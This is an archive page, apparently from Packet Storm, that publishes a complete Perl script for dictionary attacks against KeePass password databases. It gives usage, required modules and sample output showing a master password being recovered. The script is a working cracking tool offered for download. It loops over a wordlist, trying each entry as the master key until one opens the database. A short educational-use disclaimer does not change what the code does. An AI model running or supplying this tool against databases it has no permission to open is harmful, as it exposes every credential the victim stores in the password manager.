Twenty Year Anniversary

KeePass Simple Dictionary Password Enumerator

KeePass Simple Dictionary Password Enumerator
Posted Apr 4, 2018
Authored by Todor Donev

This is a simple perl script to perform dictionary attacks against the KeePass password manager.

tags | cracker, perl
MD5 | e2e787dabb8d179b58974a368b36d65f

KeePass Simple Dictionary Password Enumerator

Change Mirror Download
#!/usr/bin/perl
#
# KeePass simple dictionary password enumerator
#
# Copyright 2018 (c) Todor Donev <todor.donev at gmail.com>
# https://ethical-hacker.org/
# https://facebook.com/ethicalhackerorg
#
# KeePass is a free open source password manager,
# which helps you to manage your passwords in a
# secure way. You can put all your passwords in one
# database, which is locked with one master key or
# a key file. So you only have to remember one single
# master password or select the key file to unlock
# the whole database. The databases are encrypted
# using the best and most secure encryption algorithms
# currently known (AES and Twofish).
#
# Description:
# Dictionary Attacks are a method of using a program
# to try a list of words on the interface or program
# that is protecting the area that you want to gain
# access to. The most simple password crackers using
# dictionary attacks use a list of common single words,
# aka a "dictionary". More advanced programs often use
# a dictionary on top of mixing in numbers or common
# symbols at the beginning or end of the guessed words.
# Some can even be given a set of personal information
# or a profile of the user and pick out important words
# to guess, even if they are not proper words, such as
# pronouns like last names and names of relatives.
# A weakness of dictionary attacks is that it obviously
# relies on words supplied by a user, typically real words,
# to function. If the password is misspelled, is in another
# language, or very simply uses a word that is not in the
# dictionary or profile, it cannot succeed. Most of the
# time, even using two words in one password can thwart
# a dictionary attack.
#
#
# [todor@paladium ~]$ perl keepass.pl NewDatabase.kdbx wordlist.txt
# [+] KeePass simple dictionary password enumerator
# [*] ======
# [?] Trying admin
# [?] Trying 123456dqwdqwd
# [?] Trying dhasdasdasdadasdassfsadfdsf
# [?] Trying adsfdasdasdasdasd
# [?] Trying sdafqwdqwdqw
# [?] Trying sdadqwdqwdqdqw
# [?] Trying fi3oj12gyu3123oiu1298ud89asuda9sduas98duas
# [?] Trying sadfd87asdyhoijwqd98asud8asd
# [?] Trying sadka98sud89asud98asdhjasidasodll
# [?] Trying gfdkasjiohduiasdhaod
# [?] Trying wdpasi9ud8uas7dhuasid
# [?] Trying 3qgpdokasijdhuaygdqhwoidjpasjd
# [?] Trying ewgdasdasdczxczxc
# [?] Trying weczcxcasascsdvsdgdsfhsgfhdfd
# [?] Trying gwehdfhfghergrwegagdsgdfgdfsgdfgsd
# [?] Trying ggdsgdsfgdsfgdsfgsdf
# [?] Trying gdfsgsddwqdqwdqwd
# [*] ======
# [!] Author: Todor Donev <todor.donev at gmail.com>
# [!] https://ethical-hacker.org/
# [!] https://fb.com/ethicalhackerorg
# [*] ======
# [*] Password for NewDatabase.kdbx is Ethical-Hacker-Bulgaria-2o18
#
#
# Disclaimer:
# This or previous programs is for Educational
# purpose ONLY. Do not use it without permission.
# The usual disclaimer applies, especially the
# fact that Todor Donev is not liable for any
# damages caused by direct or indirect use of the
# information or functionality provided by these
# programs. The author or any Internet provider
# bears NO responsibility for content or misuse
# of these programs or any derivatives thereof.
# By using these programs you accept the fact
# that any damage (dataloss, system crash,
# system compromise, etc.) caused by the use
# of these programs is not Todor Donev's
# responsibility.
#
# Use them at your own risk!
#
# Requirements:
# cpan install XML::Parser
# cpan install Crypt::Rijndael
# cpan install File::KeePass
#

use warnings;
use strict;
use File::KeePass;
use open ':std', ':encoding(UTF-8)';

my $k = File::KeePass->new;
my ($p, $w) = @ARGV;
print "[+] KeePass simple dictionary password enumerator\n";
&banner and die "[!] Usage: perl $0 <Keepass DBv1 or DBv2> <Wordlist>" if @ARGV != 2;
open (KEEPASSDB, " <$p") or die "[-] Error: $p $!";
die "[-]Error: The database is empty." if (-z $p);
close (KEEPASSDB);
open (WORDLIST, " <$w") or die "[-] Error: $w $!";
die "[-] Error: Wordlist is empty" if (-z $w);
my @file = <WORDLIST>;
print "[*] ======\n";
foreach my $c(@file)
{
chomp $c;
if (! eval { $k->load_db($p, $c) }) {
print "[?] Trying $c\n";
} else{
&banner and die "[*] Password for $p is $c\n";
}
}
close (WORDLIST);
&banner and die "[-] Sorry, $@";

sub banner{
print "[*] ======\n";
print "[!] Author: Todor Donev <todor.donev at gmail.com>\n";
print "[!] https://ethical-hacker.org/\n";
print "[!] https://fb.com/ethicalhackerorg\n";
print "[*] ======\n";
}

Comments

RSS Feed Subscribe to this comment feed

No comments yet, be the first!

Login or Register to post a comment

Want To Donate?


Bitcoin: 18PFeCVLwpmaBuQqd5xAYZ8bZdvbyEWMmU

File Archive:

August 2018

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Aug 1st
    19 Files
  • 2
    Aug 2nd
    17 Files
  • 3
    Aug 3rd
    16 Files
  • 4
    Aug 4th
    1 Files
  • 5
    Aug 5th
    1 Files
  • 6
    Aug 6th
    19 Files
  • 7
    Aug 7th
    15 Files
  • 8
    Aug 8th
    9 Files
  • 9
    Aug 9th
    7 Files
  • 10
    Aug 10th
    10 Files
  • 11
    Aug 11th
    1 Files
  • 12
    Aug 12th
    0 Files
  • 13
    Aug 13th
    14 Files
  • 14
    Aug 14th
    0 Files
  • 15
    Aug 15th
    0 Files
  • 16
    Aug 16th
    0 Files
  • 17
    Aug 17th
    0 Files
  • 18
    Aug 18th
    0 Files
  • 19
    Aug 19th
    0 Files
  • 20
    Aug 20th
    0 Files
  • 21
    Aug 21st
    0 Files
  • 22
    Aug 22nd
    0 Files
  • 23
    Aug 23rd
    0 Files
  • 24
    Aug 24th
    0 Files
  • 25
    Aug 25th
    0 Files
  • 26
    Aug 26th
    0 Files
  • 27
    Aug 27th
    0 Files
  • 28
    Aug 28th
    0 Files
  • 29
    Aug 29th
    0 Files
  • 30
    Aug 30th
    0 Files
  • 31
    Aug 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2018 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close